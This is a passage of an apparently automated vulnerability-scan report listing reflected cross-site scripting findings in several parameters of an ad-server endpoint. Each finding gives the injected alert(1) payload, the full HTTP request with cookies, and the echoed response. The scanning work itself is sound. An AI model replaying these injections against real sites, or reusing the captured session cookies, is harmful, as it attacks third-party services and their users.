3.359. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f067"-alert(1)-"391365dc15b was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=6f067"-alert(1)-"391365dc15b&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=6f067"-alert(1)-"391365dc15b&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/
...[SNIP]...

3.360. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afa8c'-alert(1)-'874e7acf5a1 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=afa8c'-alert(1)-'874e7acf5a1&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=afa8c'-alert(1)-'874e7acf5a1&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/
...[SNIP]...

3.361. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a7a'-alert(1)-'05dc45748a4 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=79a7a'-alert(1)-'05dc45748a4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4683
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:40:44 GMT
Expires: Wed, 27 Apr 2011 23:40:44 GMT

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=79a7a'-alert(1)-'05dc45748a4http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608435\">
...[SNIP]...

3.362. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43394"-alert(1)-"80f259101aa was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=43394"-alert(1)-"80f259101aa HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4689
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:40:40 GMT
Expires: Wed, 27 Apr 2011 23:40:40 GMT

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=43394"-alert(1)-"80f259101aahttp://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334");
var wmode = "opaque";
var bg = "same as SWF";
var dcallows
...[SNIP]...

3.363. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe980'-alert(1)-'4cf6a47e2e4 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cnfe980'-alert(1)-'4cf6a47e2e4&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
ck.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cnfe980'-alert(1)-'4cf6a47e2e4&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=20
...[SNIP]...

3.364. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a45c"-alert(1)-"e3e5e1bb985 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn5a45c"-alert(1)-"e3e5e1bb985&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
ck.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn5a45c"-alert(1)-"e3e5e1bb985&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=20
...[SNIP]...

3.365. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab078"-alert(1)-"b329366e601 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=ab078"-alert(1)-"b329366e601&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
k%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=ab078"-alert(1)-"b329366e601&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23
...[SNIP]...

3.366. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7a3'-alert(1)-'9507be9971f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=5c7a3'-alert(1)-'9507be9971f&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
k%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=5c7a3'-alert(1)-'9507be9971f&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23
...[SNIP]...

3.367. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb3b5'-alert(1)-'31e40796ec7 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113bb3b5'-alert(1)-'31e40796ec7&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113bb3b5'-alert(1)-'31e40796ec7&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://ww
...[SNIP]...

3.368. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3576"-alert(1)-"854407b15a9 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113c3576"-alert(1)-"854407b15a9&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113c3576"-alert(1)-"854407b15a9&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://ww
...[SNIP]...

3.369. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c05'-alert(1)-'a61097db292 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A49c05'-alert(1)-'a61097db292&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A49c05'-alert(1)-'a61097db292&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt
...[SNIP]...

3.370. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74064"-alert(1)-"20216c724cc was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A74064"-alert(1)-"20216c724cc&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
